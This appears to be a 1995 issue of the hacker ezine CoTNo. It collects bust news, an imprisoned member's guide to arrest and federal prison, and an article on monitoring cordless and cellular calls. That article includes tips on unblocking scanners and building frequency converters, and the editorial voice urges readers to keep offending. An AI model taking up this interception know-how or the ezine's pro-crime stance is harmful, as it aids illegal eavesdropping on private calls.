|
||
=-=
|
||
|
||
"INTERVIEW WITH A CRYPTKEEPER"
|
||
|
||
ck: I only got busted last February (1994) for hacking
|
||
|
||
dis: I heard you got hit twice.. once last year, and once a lot more
|
||
+recently..
|
||
|
||
CK: nope, I moved, I didn't get busted. I only got busted last year,
|
||
once, that's it. And it wasn't real serious.. not like cellphone/money
|
||
laundering..just some inet hacking. I got busted for hacking the
|
||
University of Cincinnati and a few other things on the net.. they
|
||
traced me through a PBX.. they were serious. They thought I was
|
||
a spy. they were pissed to find out I was just a 16 year old.
|
||
|
||
dis: hmm... bad.. did they just search/seize or what?
|
||
|
||
ck: search/seized my computer.. I eventually got most of my stuff back
|
||
(the computer, monitor, and keyboard) and had to spend 10 days in
|
||
juvenile thats about it. oh.. and a big pain in the ass too of
|
||
course not bad at all..
|
||
|
||
dis: anything else?
|
||
|
||
ck: and tell them I was only busted ONCE, and it wasn't all that serious.
|
||
I don't have any plans to get back into the scene (it sux now), but
|
||
I do enjoy hearing about it sometimes.
|
||
|
||
=-=
|
||
|
||
"FEDZ CATCHING ON TO CALLING CARD SKAMS"
|
||
|
||
A $50 million telephone calling-card theft ring disclosed
|
||
earlier this week by federal investigators is representative of the advanced
|
||
types of scams that have emerged in the last two years as telephone companies
|
||
have become better at ferreting out fraud.
|
||
|
||
The Secret Service said Ivy James Lay, a switch engineer at MCI's network
|
||
center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
|
||
and other long distance companies, later selling them to 'band of computer
|
||
hackers.' The estimated value of the cards lies near $50 million. The
|
||
Secret Service (which investigates fraud like this) claims this to be the
|
||
largest case of calling card theft to date.
|
||
|
||
=-=-=
|
||
|
||
"SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
|
||
|
||
Two computer hackers have been sentenced to fed. prison and an accomplice in
|
||
Mn. awaits sentencing for his part in an international phone conspiracy.
|
||
Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C.,
|
||
were part of a hacker ring that stole credit-card numbers from MCI's
|
||
Computer terminal in Greensboro. A third member of the ring, Leroy James
|
||
Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
|
||
copyright violations.
|
||
|
||
US District Court Judge James Beaty on Fri. sentenced Lay to tree years
|
||
and two months in prison. Stanton, a 22-year-old student at Wingate College,
|
||
was sentenced to one year. Anderson's sentencing is expected this summer.
|
||
|
||
The conspiracy stretched into several European countries and cost long-
|
||
distance carriers more than $28 millon, authorities said.
|
||
|
||
Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
|
||
in unauthorized access devices. The group bought and sold at least 50,000
|
||
numbers from 1992 until the summer of 1994, according to court documents.
|
||
|
||
"What I did was very stupid," Stanton told Judge Beaty at his sentencing.
|
||
"I'd like to go back and finish college."
|
||
|
||
=-=-=
|
||
|
||
"SHOCKER[303] GETS NAILED FOR CC'S"
|
||
|
||
Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
|
||
bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
|
||
listened to you. Fuck me. Got my mac taken away, I am writing this from a
|
||
friends, I am not supposed to be here either, but hell, I got everything taken
|
||
away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
|
||
happens, I'll call you sometime if I can get to the phone w/out my parents
|
||
knowing. I can't have anything back until I pay for this shit, I think it is
|
||
between $400 and $500, not sure, I already paid $170, but then I hafta
|
||
fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
|
||
got like, a felony and a second degree misdemeanor for that shit, they
|
||
will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
|
||
and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
|
||
see ya ok? Bye..
|
||
|
||
=-=-=
|
||
|
||
"NYHE RUMORS"
|
||
|
||
The New York Hack Exchange got busted for scams and cellfonez...
|
||
|
||
(Someone mail me with more than a rumor please)
|
||
|
||
=-=-=
|
||
|
||
"WAREZ BOARD BUSTS AROUND THE COUNTRY"
|
||
|
||
Bad Sector [BUSTED!]
|
||
Beyond Corruption [BUSTED!]
|
||
Jurrasic Park [BUSTED!]
|
||
Lineup [BUSTED!]
|
||
Main Frame [BUSTED!]
|
||
Necronomicon [BUSTED!]
|
||
No BBS [BUSTED!]
|
||
The Notice [BUSTED!]
|
||
On The World [BUSTED!]
|
||
Perfect Crime [BUSTED!]
|
||
Red Alert [BUSTED!]
|
||
Restricted Area [BUSTED!]
|
||
Rubbish Heap [BUSTED!]
|
||
Skull Island [BUSTED!]
|
||
Twins [BUSTED!]
|
||
The Underworld [BUSTED!]
|
||
Wolf Pack [BUSTED!]
|
||
|
||
15 Arrests
|
||
75 RCMP Officers Involved
|
||
Removed at least 11 BBSs in one day
|
||
Seized more than $200,000 in computer hardware
|
||
Operation/Investigation lasted 6 months to 1 year
|
||
April 12, 1995
|
||
Busts are localized in Montreal
|
||
514 NPA
|
||
|
||
=-=-=
|
||
|
||
"DUTCH HACKER ARRESTED"
|
||
|
||
(from CUD 7.21):
|
||
|
||
--------------Original message----------------
|
||
|
||
UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
|
||
become the first person to be convicted of computer hacking in the
|
||
Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
|
||
student, was handed down a six month suspended sentence by
|
||
magistrates last week, and was fined around $3,200
|
||
|
||
Oosteveen was accused of breaking into university, corporate and
|
||
government computers, following his arrested in March, 1993, just
|
||
three weeks after new Dutch anti-hacking legislation came into force.
|
||
|
||
Oosteveen was caught in the act of trying to hack into the computer
|
||
lines of a technical university in Delft near The Hague. He is also
|
||
thought to have been responsible for previous hacking attacks which
|
||
occurred before the new legislation came into force.
|
||
|
||
=-=-=
|
||
|
||
"THE EAST COAST"
|
||
|
||
Tabas and Others Bust:
|
||
|
||
According to Gatsby, the following were busted: Himself, Mark Tabas
|
||
KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
|
||
|
||
(When I talked to him, he wasn't able to say much since it was the day
|
||
after the bust)
|
||
|
||
From empire Times:
|
||
February 22, 1995
|
||
|
||
One thing all the people have in common: Southwestern Bell - or at the very
|
||
least, the desire and ability to hack all the switches on the west coast.
|
||
|
||
According to those involved, it goes way beyond switches...
|
||
|
||
=-=-=
|
||
|
||
"THE LAMACCHIA CASE"
|
||
|
||
April 94:
|
||
|
||
BOSTON, MA ...A federal grand jury returned a felony indictment today
|
||
charging an MIT student in a computer fraud scheme resulting in the piracy of
|
||
an estimated million dollars in business and entertainment computer software.
|
||
|
||
United States Attorney Donald K. Stern and FBI Special Agent In
|
||
Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
|
||
currently a junior at the Massachusetts Institute of Technology, was charged
|
||
in a one count felony indictment with conspiring to commit wire fraud. The
|
||
indictment charges that between November 21, 1993 and January 5, 1994
|
||
LAMACCHIA operated a computer bulletin board service that permitted users
|
||
to copy copyrighted business and entertainment software without paying to
|
||
purchase the software. The bulletin board was operated without authorization
|
||
on MIT computer work stations and was accessible to users worldwide over the
|
||
Internet... [Losses] are estimated to exceed a million dollars. [bahaha]
|
||
|
||
=-=-=
|
||
|
||
"BRITISH CALLING CARD BUST"
|
||
|
||
British students have taken part in an alleged <20>65m computer fraud,
|
||
involving the electronic theft of cards that allow users to make free
|
||
telephone calls around the world.
|
||
|
||
The hackers, one of whom was only 17 years old, were said to be earning
|
||
thousands of pounds a month selling cards... Police found one teenager
|
||
driving a new <20>20,000 car and with computer equipment worth <20>29,000 in his
|
||
bedroom.
|
||
|
||
AT&T officials also found a computer noticeboard called "Living Chaos"
|
||
that was being used to sell the cards for up to <20>30 each. It mentioned
|
||
Andy Gaspard, an employee of the Cleartel telephone company in
|
||
Washington, whose home was raided. "We found 61,500 stolen cards ready
|
||
to be sent to Britain," said Eric Watley, a secret service agent in the city.
|
||
|
||
(The Sunday Times, 12 February 1995)
|
||
|
||
=-=
|
||
|
||
"TNO BUST OF 1994 - NEW NEWS"
|
||
|
||
(my comments in [ ])
|
||
|
||
ROCKY MOUNTAIN NEWS
|
||
(Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
|
||
Quartet accused of hacking into Arapahoe college's system,
|
||
inciting illegal acts.
|
||
|
||
---------------------------------------------------------------------------
|
||
(Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
|
||
Suspects used equipment at college to incite criminal acts, officials say.
|
||
|
||
Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!]
|
||
allegedly gained access to the Arapahoe Community College computer and
|
||
used it to distribute tips on how to commit crimes.
|
||
One man operated a computer bulletin board on which contributors
|
||
from throughout the world exchanged how-to information on crimes ranging
|
||
from credit-card fraud to high-tech burglary, authorities said. [Of course
|
||
they fail to make that distinguishing gap that this board was NOT run off
|
||
the Arapahoe system, and that it was a private BBS run out of his house]
|
||
Computers were seized from the homes of four hackers, ranging in
|
||
age from 15 to 21. Secret Service experts were called in to help crack
|
||
the computer files. ['type filename.txt' is hard to crack eh?]
|
||
Investigators found software for breaking passwords, lists of
|
||
private passwords for several computer systems, instructions for cellular
|
||
telephone fraud, private credit reports [Plural? Nope], lists of credit-card
|
||
numbers and electronic manuals on how to make bombs and illegal drugs.
|
||
[Yes, WE did the oklahoma bombing!@$!]
|
||
In a 97-page affidavit detailing the 18-month investigation,
|
||
investigator John Davis of the Arapahoe district attorney's office said
|
||
that the hackers "operate with an attitude of indifference to the rights
|
||
and privacy of others and have made efforts to teach and involve others in
|
||
their criminal enterprise." [What the fuck does the government do everyday?]
|
||
At the home of a Denver juvenile, authorities found hazardous
|
||
chemicals and a book on how to make bombs.
|
||
Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
|
||
of Thornton, were charged last month with committing computer crimes and
|
||
conspiracy. Both are scheduled to appear in Arapahoe County Court on July
|
||
5.
|
||
A decision is pending on whether to charge a 15-year-old Highlands
|
||
Ranch youth and a 17-year-old Denver resident, chief deputy district
|
||
attorney John Jordan said Friday.
|
||
The affidavit says Papadenis, Jackson, and the youths hacked into
|
||
the Arapahoe County Community College computer system, then used it to
|
||
illegally distribute copyrighted computer games [Sorry, TNo doesn't have
|
||
a warez division yet] and electronic magazines promoting fraud, theft,
|
||
burglary and money-laundering.
|
||
One of the magazines stated, "This publication contains information
|
||
pertaining to illegal acts. The use of this information is intended solely
|
||
for evil purposes." [Source: CoTNo 1!@#!@]
|
||
Court documents do not indicate the hackers had political motives,
|
||
and authorities declined to comment on the case. [Hackers with political
|
||
motives would be way above their head.]
|
||
A Denver University expert said computer criminals usually are not
|
||
motivated by ideology. They usually are young people who are "doing it for
|
||
the sheer challenge of it - just to demonstrate that they're able to do it,"
|
||
said Don McCubbery, director for the center on electronic commerce at DU.
|
||
McCubbery estimates that authorities learn of only 5% of computer
|
||
crimes. He said computer security experts generally have difficulty
|
||
keeping up with the hackers. [No shit]
|
||
|
||
-----------------------------------------------
|
||
(Side note box) THE NEW ORDER (Bullet listing)
|
||
|
||
Some accusations listed in court documents concerning The New Order group
|
||
of computer hackers:
|
||
- A hacker from the United Kingdom offered suspect John Jackson
|
||
a VISA card number with a $300,000 credit limit. [Tacos anyone?]
|
||
- A computer seized from a Highlands Ranch home contained password
|
||
files for computer systems at the University of Colorado
|
||
at Boulder.
|
||
- A note found in Jackson's home indicated his plans to hack into
|
||
the Thornton Police Department computer. [Yes, they believe
|
||
everything they read]
|
||
- Jackson also had a computer file containing access information
|
||
for Taco Bell and McDonald's computers. [There goes national
|
||
security!]
|
||
|
||
=-=
|
||
|
||
That is all for now. Not a good year by any means as you can tell,
|
||
especially considering who else may have been busted, that we didn't hear
|
||
about. Don't stop what you are doing though, just be more careful of
|
||
your activities. YOU are right, THEY are wrong.
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
What Happens When You Get Caught
|
||
--------------------------------
|
||
[A.K.A The Hackers Guide to the Law and Prisons]
|
||
|
||
by
|
||
|
||
D. Fanning - A.K.A. John Falcon/Renegade - TNO
|
||
|
||
|
||
Well if you are reading this, that means you are either curious or shit
|
||
happened and the law reared it's ugly head and they nabbed you. Now what
|
||
you are about to read is absolutely fucking true. Why is this? Because I
|
||
am spending the next year or so in prison for hacking. Now needless to
|
||
say, I have already announced my retirement from the scene, but I still
|
||
wanted to write and rant and rave about all the things that happen in this
|
||
world and to clue you in on a quite a few things.
|
||
|
||
Let's start with the ground rules:
|
||
|
||
1. You cannot make a deal with a cop. So when they start reading Miranda
|
||
rights, keep silent or just ask inconspicuous questions like "Where are we
|
||
going?", or the common ne, "What's going on here? Why am I being charged?"
|
||
|
||
Only a D.A. or someone in the lawyer capacity can make a deal. If a
|
||
cop offers a deal, you are still going to get charged. Cops cannot
|
||
make any exceptions on anyone. So drop all ideas of such.
|
||
|
||
2. Do not narc on anyone when the questioning starts. Your best bet would
|
||
be to just stay silent till the lawyer shows up or something. Why?
|
||
Questioning wouldn't be done unless there were gaps in their
|
||
investigation. What you want is as many of those as possible. The
|
||
more you have, the better it will be when plea bargaining starts up.
|
||
At the very least though, lets say the they do convict you, the feds
|
||
and the court find you guilty or you plea that way and you are thrown
|
||
into the clink. Guess who does your admissions paperwork? You guessed
|
||
it, the inmates. Word has a way of coming around to dealing or giving
|
||
a very wide berth to those who do the narc thing Key idea: "If you
|
||
fall, don't bring others down too. It just adds to the load on you."
|
||
|
||
3. During questioning, they will put on a lot of plays to make you talk,
|
||
they will offer you something to drink or something to make you feel
|
||
more comfortable. Well why not? Spend 60 cents and get your work done
|
||
for you by a confession. Makes things nice and neat. Don't fall for
|
||
it. If you are thirsty, accept the drink and don't tell them shit.
|
||
|
||
4. They will also do some kind of powerplay on you. They try to make you
|
||
think that they are doing you a favor, but in reality, you are digging
|
||
a deeper hole for yourself.
|
||
|
||
5. The idea of you being innocent until proven guilty has gone the way of
|
||
the do-do bird. When a jury sees you, the first thought that comes to
|
||
mind is not if you are guilty or not, the question is HOW guilty you
|
||
are. The way they see it, if you are not guilty, what are you doing
|
||
in front of them in the first place? The O.J. Simpson trial is a
|
||
perfect example. Also, look how many cop shows are around the box.
|
||
That right there is a disgrace in my book. First they have you on
|
||
film, second they pat each other on the back while you are in
|
||
misery. Sick.
|
||
|
||
Well on with the show. If they have already done an investigation on you
|
||
and you don't hear from them in a while, the first natural reaction would
|
||
be to relax and let your guard down. WRONG ANSWER! That means that some
|
||
shit is really going to go down. You should be extra careful and not
|
||
talk about it to anyone. Most likely they are looking for more evidence
|
||
to make it harder on you in the long run, like a wiretap. In the federal
|
||
system, all you need is one person's permission to record a phone call.
|
||
If you have to talk about it, use face to face contact and pat each other
|
||
down to make sure there is no bug. For instance, when I was arrested I made
|
||
a fatal mistake and talked about it to one of the co-defendants and he
|
||
had cut a deal with the D.A. already. My bacon was cooked when I heard
|
||
my voice on a tape recording.
|
||
|
||
Well no matter what happens, sooner or later you will get nabbed so I won't
|
||
get into the details of this. All I can suggest is that you really do
|
||
what ever you can to get a real attorney. P.D.'s are good for some
|
||
things but they get their paycheck from the same place that nabbed you in
|
||
the first place so don't let that fool you too much. I will admit that
|
||
it is better than nothing though.
|
||
|
||
Most likely for the computer hackers out there, they will charge you
|
||
under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access
|
||
Device. This charge was mainly intended for credit cards but the D.A.'s
|
||
have taken it to just about everything that involves computers or
|
||
communications in general.
|
||
|
||
Now there are some landmark cases that have beat this into the ground.
|
||
One of them being U.S. vs Brady which was a guy making satellite decoders
|
||
with the stops pulled out of them. He beat this due to the ruling that
|
||
the signal was out there everywhere and that he merely just decoded the
|
||
signal. Therefore there was no actual loss, just potential loss which
|
||
doesn't count. Another one is U.S. vs McNutt in the 10th Circuit of
|
||
Utah. This guy made chips for cellular phones that would send different
|
||
ESN/MIN pairs to the cell site that made it always seem like a new roamer
|
||
every time he calls. The cell site just goes ahead and gives him the call
|
||
because it doesn't have time to verify if it is a valid MIN/ESN pair. He
|
||
won the case due to the same fact that there were no accountable loss
|
||
because it never used or really billed any legit customer.
|
||
|
||
The flip side of that is being two weeks ago from when this was written,
|
||
a guy was tried in LA for the exact same thing and was found guilty,
|
||
appealed the case, won the appeal, then the government re-appealed it and
|
||
he lost again. This caused a split in the court circuits which means
|
||
that this will got the Supreme Court.
|
||
|
||
Remember that the government or any government agency will not press any
|
||
issue unless there is some kind of financial deal behind it because they
|
||
are wasting time and resources on you when they can be getting Joe Blow
|
||
Cartel Drug Dealer.
|
||
|
||
So they find you guilty or you plea. The next step is the Pre-Sentence
|
||
Investigation. They basically take a fine tooth comb and find any dirt
|
||
about you that they can. You will be amazed about all the things they
|
||
can do to make you seem like a threat to society, the American way of
|
||
life, apple pie and all... All you can do is make sure or try your
|
||
hardest to make it clean as possible. Now I got ripped hard on mine due
|
||
to very strained relations with one of my parents and they managed to
|
||
throw everything that anyone had ever said about me together to make it
|
||
look like I was truly evil. That is where the cops will come back and
|
||
haunt you because everything you say will be in that report. Every
|
||
little action and all will be written with a slant of a cop. (Needless to
|
||
say who writes the report kids... The U.S. Probation Office, a branch of
|
||
the Secret Service and the F.B.I.)
|
||
|
||
Well you are convicted and here you are. Depending on where you live,
|
||
you will either be bussed/vanned to the prison where they choose for
|
||
you or they will fly you there. After you are sentenced you now belong
|
||
to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken
|
||
to a county jail for holding while they classify you and then you get
|
||
transported out. When I was transported out, I was in shackles and all
|
||
taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated
|
||
from drug busts and converted them into their own use. You are basically
|
||
bussed out to a unused or empty part of the airport and with a large ring of
|
||
USM's with shotguns in their hand, you get put onto an airplane and given a
|
||
box lunch and off you go. I went from Portland to Sacramento to Phoenix
|
||
in one day. Spent the night at the FCI in Phoenix then the next morning
|
||
from there to Lompoc where I am now.
|
||
|
||
Remember these words though... You are now property of the B.O.P. Basically
|
||
you are luggage, they can transport you at any time whenever they want to.
|
||
But, depending on where you go, it isn't all that bad. Most likely you will
|
||
meet friends or acquaintances that will help you along. Just ask a few
|
||
questions and usually they will know. One thing to never do is be secretive
|
||
about why you are there. You are there, most likely someone else is there
|
||
for the same thing and you can get a strong fellowship going with people
|
||
in the same predicament.
|
||
|
||
One thing to always keep in mind from now to eternity, no matter where you go.
|
||
The feds are nailing everyone for 'Conspiracy'. It's a damn shame when
|
||
you go to a place where 90 percent of the inmate population is here on some
|
||
kind of drug related charge and of that 90%, 35% are here on conspiracy
|
||
related charges. Truly something to think about.
|
||
|
||
Now for the hackers and phreakers that are facing jail. If your PSI report
|
||
even breaths any mention of some kind of use with the computer, you will be
|
||
banned from that. 3 days ago I was given a list of direct orders to avoid
|
||
all contact of that. Likewise, they put a restriction on the levels of
|
||
computer related material that I can read. Usually you can get any
|
||
periodical you want except for things that deal with gay man on man stuff.
|
||
Just like the gay people feel, that smells of discrimination but that's
|
||
just the way it is.
|
||
|
||
Phones are something else that you will wish that changes real quick. The
|
||
phones are run by a B.O.P. thing called ITS-Inmate Telephone Services.
|
||
Basically it's a Unix run PBX that limits the people you can call and it
|
||
throws the bill on you. No more collect calls or anything of that nature.
|
||
Just doesn't happen. But the inmates have won a Class action suit against
|
||
the B.O.P. about this and the government right now is appealing it.
|
||
Technically with a suit or even an appeal, you have to implement it
|
||
as soon as you can after the judgement is made. But it's been a year
|
||
since they won it and nothing changes. Basically it's the government stalling.
|
||
|
||
Well that's all for me to say this time around. Remember to keep the dream
|
||
alive and judge for yourself with that piece of gray matter between your
|
||
ears.
|
||
|
||
You can write any comments to me at:
|
||
Fanning
|
||
Reg No. 12617-006
|
||
3600 Guard Road
|
||
Lompoc, CA 93436
|
||
|
||
or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
|
||
(I prefer the first method to save my friends postage costs.)
|
||
|
||
Keep it strong - TNO (The New Order)
|
||
|
||
John Falcon - Ex-TNo
|
||
1981-1994
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
--- Legal and Technical Aspects of RF Monitoring ---
|
||
|
||
--- Major [TNo] ---
|
||
|
||
|
||
|
||
SYNOPSIS
|
||
--------
|
||
The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article
|
||
doubtlessly sparked an interest in cordless phone monitoring. Wireless
|
||
telephones are a prime target for monitoring. Both cordless and cellular
|
||
telephones are nothing more than radio transceivers that, at some point,
|
||
interface with the telephone system. This article will seek to expand on
|
||
and clarify some points made in "Cordless Fun", and also to point to some
|
||
other areas of interest.
|
||
|
||
=============================================================================
|
||
|
||
|
||
CORDLESS
|
||
--------
|
||
Legal Stuff:
|
||
Monitoring cordless phones is now a federal crime! Recent legislation
|
||
prohibits listening in on cordless phones, much the same as cellular phones.
|
||
Also, the Communications Act of 1934 makes it a crime to divulge
|
||
anything you monitor to another person. It is also illegal to use anything
|
||
that you hear for personal gain. Note that this applies to anything that you
|
||
monitor, not just cordless phones. Alternatively, there are presently no
|
||
restrictions on scanners that are capable of receiving cordless phone
|
||
frequencies. However, I suspect that in the near future the feds will deny
|
||
certification to such scanners, as they did with scanners that could receive
|
||
cellular frequencies.
|
||
|
||
Technical Stuff:
|
||
Cordless telephones transmit and receive with very low power. This is
|
||
primarily to minimize interference with other nearby cordless telephones.
|
||
This makes scanning for cordless telephones a short-range endeavor. Most
|
||
cordless phones of recent manufacture operate in the 46-49MHz range.
|
||
However, the FCC has recently opened up a part of the 900MHz spectrum for
|
||
cordless telephone usage. The new 900MHz phones often offer greater range
|
||
and increased clarity. There are also models sporting "spread-spectrum"
|
||
technology, which makes monitoring with conventional scanning-receivers a
|
||
virtual impossibility. Another security measure on some cordless phones
|
||
involves encoding the DTMF tones sent from the handset to the base. This
|
||
prevents the base from accepting tones from other, unauthorized, handsets.
|
||
It does not hinder monitoring the calls, but the DTMF tones will not be
|
||
recognizable. In the 46-49MHz phones, there are ten frequency pairs
|
||
available. Many older phones only utilize one pair. Newer, more expensive,
|
||
phones can utilize all ten pairs. Some automatically search for an open
|
||
channel, while others can be manually manipulated to find a channel with less
|
||
noise. Likewise, the new 900MHz phones will scan to find a clear channel.
|
||
|
||
|
||
CELLULAR
|
||
--------
|
||
Legal Stuff:
|
||
Intercepting cellular mobile telephone (CMT) traffic is illegal. The
|
||
Electronic Communications Privacy Act of 1986 made it so. Scanners that
|
||
receive the CMT portion of the 800MHz range may no longer be manufactured,
|
||
sold, or imported into the U.S. Many scanners were designed to scan this
|
||
area, though. When the Cellular Telephone Industry Association began
|
||
complaining about this fact, most scanner manufacturers/resalers voluntarily
|
||
"blocked" the cellular freqs from their scanners. This pacified the CTIA for
|
||
a while, but the "blocks" were easily hackable. Typically, restoring a
|
||
"blocked" scanner involved removing a single diode, a ten minute job for even
|
||
the most devout technophobe. This fact led to the passage of the Telephone
|
||
Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C.
|
||
certification of scanners that receive cellular freqs, or those which may be
|
||
easily modified to do so. New scanners will be "blocked" at the CPU, and
|
||
hacking them is unlikely. Frequency converters offered another means of
|
||
monitoring cellular and other 800MHz traffic. Essentially, a converter
|
||
receives an 800MHz signal, and converts it to a 400MHz signal that the scanner
|
||
is capable of receiving. Converters are useful for scanners that have no
|
||
800MHz reception capabilities, as well as those that have portions of the
|
||
800MHz band blocked. Unfortunately, converters were also outlawed by the
|
||
TDDRA. They are still legal in kit-form, however. Another option would be
|
||
to build one from scratch, which isn't an especially difficult project.
|
||
|
||
Technical Stuff:
|
||
The word "cellular" defines the cellular phone system. A service area is
|
||
broken up into many small cells. As a user travels through an area, his call
|
||
will be handed off from one cell to the next. This handoff is transparent to
|
||
the user, but a monitor will lose the conversation. Cellular phones use low
|
||
power (a maximum of five watts) so that a cell phone will not attempt to seize
|
||
more than one site at a time. When a call is initiated by a cell phone, the
|
||
nearest site will respond, and assign an available frequency to the phone.
|
||
When the user moves comes into range of the next site, the process repeats
|
||
itself, and the new site will assign a new frequency. Therefore, it can be
|
||
difficult to track a particular conversation as it moves from site to site
|
||
with a single scanner. Every area served by cellular phones will have two
|
||
service providers. One will be the local RBOC, while the other will be a
|
||
cellular-only provider. The two systems are designated as "A" and "B"
|
||
systems, or "Wireline" and "Non-Wireline". There is no difference between
|
||
the two for monitoring purposes, but since "A" and "B" carriers use different
|
||
frequencies, it should be possible to identify local cell-towers as being "A"
|
||
or "B" sites.
|
||
|
||
|
||
PHONE PATCH
|
||
-----------
|
||
Legal Stuff:
|
||
The Communications Act of 1934 applies here as well, but there are no other
|
||
prohibitions on monitoring business-band phone patches.
|
||
|
||
Technical Stuff:
|
||
Many business radio systems have the ability to tie into the phone
|
||
system. Most of these systems will be found in 800MHz trunked
|
||
radio systems. In a conventional radio system, one frequency will
|
||
equal one channel. In a trunked system, however, frequencies and
|
||
channels are independent of each other. The trunking computer will
|
||
assign a different frequency to a radio each time it transmits,
|
||
and it will send a signal to other radios on the same channel,
|
||
telling them the current frequency in use. Phone patches are easy
|
||
to monitor, though. Since the radio on a phone patch is
|
||
transmitting constantly, the frequency used will remain the same
|
||
for the duration of the conversation. Many people mistakenly
|
||
believe these calls to be cellular, but they are not. Most phone
|
||
patches found in 800MHz trunked systems will be full-duplex, just
|
||
like cellular and home phones. Some systems, especially in UHF
|
||
(around 450MHz) and 800MHz conventional radio systems will only be
|
||
half-duplex, though. In those systems, only one person call talk
|
||
at a time, just like normal two-way radios. Radio systems are
|
||
typically designed to offer service to an entire metropolitan area,
|
||
so range is quite good. The mobile radio will transmit its signal
|
||
to a strategically located "repeater", which then re-broadcasts the
|
||
signal with much more power. So long as a scanner is within
|
||
reception range of the repeater output, monitoring will be possible
|
||
regardless of the location of the party transmitting.
|
||
|
||
|
||
|
||
EQUIPMENT
|
||
----------
|
||
Legal Stuff:
|
||
Some states prohibit mobile use of scanners. Also, it is illegal
|
||
to use a scanner in the commission of a crime.
|
||
|
||
Technical Stuff:
|
||
There is a scanner for every appetite. What sort of monitoring
|
||
one wants to do will dictate which scanner one buys. For someone
|
||
interested only in cordless phones, a ten-channel scanner with no
|
||
800MHz coverage will be quite adequate, and much cheaper than a
|
||
more capable scanner. For someone interested in cellular, a full-
|
||
coverage 800MHz scanner with a much greater frequency storage
|
||
capacity will be necessary. Base, mobile or handheld? Depends
|
||
entirely on how it will be used. Modern scanners are programmable,
|
||
while older units require crystals. For someone wanting to monitor
|
||
only a few channels (such as cordless phones, or the local police),
|
||
a crystal-controlled scanner would be adequate, and much cheaper.
|
||
But for more serious and varied scanning, programmable units are
|
||
a necessity. Models are available that store between 10 and 1000
|
||
channels. Uniden/Bearcat and Realistic are the two most commonly
|
||
available brands in the U.S. (although Realistic isn't actually a
|
||
brand, just a label...Radio Shack scanners are all manufactured by
|
||
Uniden or GRE, depending on the model). Because of the TDDRA, many
|
||
of the best scanners from the past several years are no longer
|
||
available, but watch for Hamfests (great electronic flea-
|
||
markets...inquire at your local ham radio/electronics store),
|
||
garage sales, etc. There is nothing in the TDDRA or other current
|
||
legislation that prevents private parties from owning or selling
|
||
pre-TDDRA equipment. Aside from the scanner itself, the next-most
|
||
important piece of equipment is the antenna. Handheld scanners
|
||
will generally utilize an "all-band" rubber-duck antenna (a
|
||
flexible, rubberized antenna, between 8-14" in length), while base
|
||
units will have a telescoping metal whip antenna. These antennas
|
||
are adequate for receiving strong, local signals, but more
|
||
discriminating monitors will demand more. For base units, an all
|
||
band discone type antenna, mounted outside as high as practical,
|
||
will offer good, omnidirectional performance. For those who only
|
||
want to monitor a particular band, it would be best to use an
|
||
antenna cut specifically for that band. Likewise, for those
|
||
monitoring signals coming from one general direction, a directional
|
||
antenna will offer better performance than an omnidirectional unit.
|
||
For mobile use, using an antenna mounted on the vehicle will
|
||
greatly improve reception.
|
||
|
||
|
||
MISCELLANEOUS COMMUNICATIONS
|
||
----------------------------
|
||
Voice-pagers can offer interesting monitoring. While the data-
|
||
transmissions that send the signal to the proper pager are
|
||
proprietary digital signals (and as such, illegal to monitor or
|
||
decipher), the actual "voice messages" are transmitted "in the
|
||
clear".
|
||
Packet-radio is used by ham radio operators. They have a vast
|
||
network of computer bbs's that operate independently of the phone
|
||
system. Modulated data is sent over the airwaves with a ham
|
||
transceiver, where it is received and de-modulated with a Terminal
|
||
Node Controller (TNC). Expect the use of wireless data
|
||
transmissions to increase over the next few years, and not just
|
||
among ham operators.
|
||
While not having anything to do with telephones, the "baby
|
||
monitors" people use are transmitters just like cordless phones.
|
||
They are also low-power devices, so range is limited. Most people
|
||
who use these devices would be shocked to learn that they are
|
||
"bugging" their own home.
|
||
|
||
PRESENT AND FUTURE CHALLENGES
|
||
-----------------------------
|
||
Spread spectrum, digital transmissions, encryption...these are all
|
||
factors that are affecting monitoring today. While most cellular
|
||
systems are presently analog systems, there are operational digital
|
||
systems in some areas. Scanners that are currently available won't
|
||
be able to decipher the digital communications, and it is unlikely
|
||
that digital-capable scanners will be produced. That means it will
|
||
be up to the hackers to provide the technology to intercept these
|
||
communications. Spread spectrum is quite hackable, as it was never
|
||
intended as an encryption system, per se, yet the phone
|
||
manufacturers are certainly marketing it as such. And one oft
|
||
overlooked advantage of the Clipper chip is the fact that the
|
||
backdoor can be exploited by hackers as well as the government.
|
||
In the meanwhile, there are plenty of intercepts to be had, and
|
||
there will continue to be.
|
||
|
||
|
||
=================================================================
|
||
|
||
For More Information:
|
||
=================================================================
|
||
|
||
Scanner Modification Handbook (Vols. I & II), by Bill Cheek
|
||
